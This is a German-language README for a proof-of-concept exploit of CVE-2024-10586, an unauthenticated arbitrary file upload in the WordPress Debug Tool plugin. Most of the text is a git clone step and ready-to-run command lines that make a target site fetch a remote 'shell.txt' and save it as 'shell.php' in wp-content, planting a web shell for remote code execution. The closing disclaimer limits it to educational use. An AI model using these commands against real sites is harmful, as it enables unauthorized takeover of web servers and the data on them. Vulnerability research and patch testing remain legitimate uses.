
Proof-of-Concept-Exploit für CVE-2024-10586, das das WordPress-Plugin Debug Tool angreift. Automatisiert den Upload beliebiger Dateien, der über nicht authentifizierte POST-Anfragen zu Remote Code Execution führt.
Beschreibung
Das Debug-Tool-Plugin für WordPress ist in allen Versionen bis einschließlich 2.2 anfällig für die Erstellung beliebiger Dateien, da in der Funktion dbt_pull_image() eine Berechtigungsprüfung und eine Dateitypvalidierung fehlen.
Dadurch ist es nicht authentifizierten Angreifern möglich, beliebige Dateien wie .php-Dateien zu erstellen, die für die Remote-Codeausführung ausgenutzt werden können.
CVE-2024-10586
git clone https://github.com/Nxploited/CVE-2024-10586-Poc
cd CVE-2024-10586-Poc
Führen Sie das Skript mit dem folgenden Befehl aus: python CVE-2024-10586.py -u -r -p
python CVE-2024-10586.py -u http://192.168.100.74/wordpress -r http://192.168.100.74/shell.txt -p /opt/lampp/htdocs/wordpress/wp-content/shell.php
python CVE-2024-10586.py -u http://192.168.100.74/wordpress -r http://192.168.100.74/shell.txt -p /opt/lampp/htdocs/wordpress/wp-content/shell.php
usage: CVE-2024-10586.py [-h] -u URL -r REMOTE [-p PATH]
Send a POST request to WordPress admin-ajax.php.
options:
-h, --help show this help message and exit
-u URL, --url URL The base URL of the WordPress site.
-r REMOTE, --remote REMOTE
The remote URL to use in the 'source' parameter.
-p PATH, --path PATH The file path to use in the 'missed' parameter. Defaults to '/opt/lampp/htdocs/wordpress/wp-content/Nxploit.php'.
Dieses Skript dient nur zu Bildungszwecken. Verwenden Sie es verantwortungsvoll und ausschließlich auf Systemen, die Ihnen gehören oder für die Sie eine ausdrückliche Genehmigung zum Testen haben. Die Autoren sind nicht verantwortlich für Missbrauch oder Schäden, die durch dieses Tool verursacht werden.